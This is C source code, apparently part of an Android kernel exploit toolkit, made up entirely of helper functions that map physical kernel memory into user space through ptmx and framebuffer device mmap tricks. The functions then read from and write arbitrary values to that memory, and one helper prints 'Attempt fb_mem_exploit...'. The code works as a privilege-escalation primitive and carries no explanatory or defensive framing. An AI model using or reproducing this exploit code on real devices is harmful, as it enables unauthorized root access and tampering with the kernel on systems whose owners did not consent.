bool
map_kernel_memory(void)
{
if (!kernel_physical_offset) {
if (!setup_variables()) {
return false;
}
}
fb_mmap_fd = -1;
kernel_mapped_address = PTMX_MEMORY_MAPPED_ADDRESS;
if (ptmx_map_memory(PTMX_MEMORY_MAPPED_ADDRESS, kernel_physical_offset, KERNEL_MEMORY_SIZE)) {
return true;
}
fb_mem_set_kernel_phys_offset(kernel_physical_offset - 0x8000);
printf("Attempt fb_mem_exploit...\n");
fb_mem_mmap_base = fb_mem_mmap(&fb_mmap_fd);
if (fb_mem_mmap_base) {
kernel_mapped_address = (unsigned long int)fb_mem_convert_to_mmaped_address((void *)KERNEL_BASE_ADDRESS, fb_mem_mmap_base);
return true;
}
fb_mmap_fd = -1;
return false;
}
static bool
attempt_mmap_fb_mem_exploit(exploit_memory_callback_t callback_func, void *callback_param)
{
unsigned long int offset;
int fd;
void *address;
bool result;
offset = get_kernel_physical_offset();
if (offset) {
fb_mem_set_kernel_phys_offset(offset - 0x00008000);
}
address = fb_mem_mmap(&fd);
if (address == MAP_FAILED) {
return false;
}
result = callback_func(fb_mem_convert_to_mmaped_address((void *)PAGE_OFFSET, address),
KERNEL_SIZE,
callback_param);
fb_mem_munmap(address, fd);
return result;
}
bool
fb_mem_run_exploit(bool(*exploit_callback)(void *mmap_base_address, void *user_data),
void *user_data)
{
void *mapped_address = NULL;
int fd;
bool success;
mapped_address = fb_mem_mmap(&fd);
if (mapped_address == MAP_FAILED) {
return false;
}
success = exploit_callback(mapped_address, user_data);
fb_mem_munmap(mapped_address, fd);
return success;
}
bool
fb_mem_write_value_at_address(unsigned long int address, int value)
{
void *mmap_address = NULL;
int *write_address;
int fd;
mmap_address = fb_mem_mmap(&fd);
if (mmap_address == MAP_FAILED) {
return false;
}
write_address = (int*)fb_mem_convert_to_mmaped_address((void*)address, mmap_address);
*write_address = value;
fb_mem_munmap(mmap_address, fd);
return true;
}
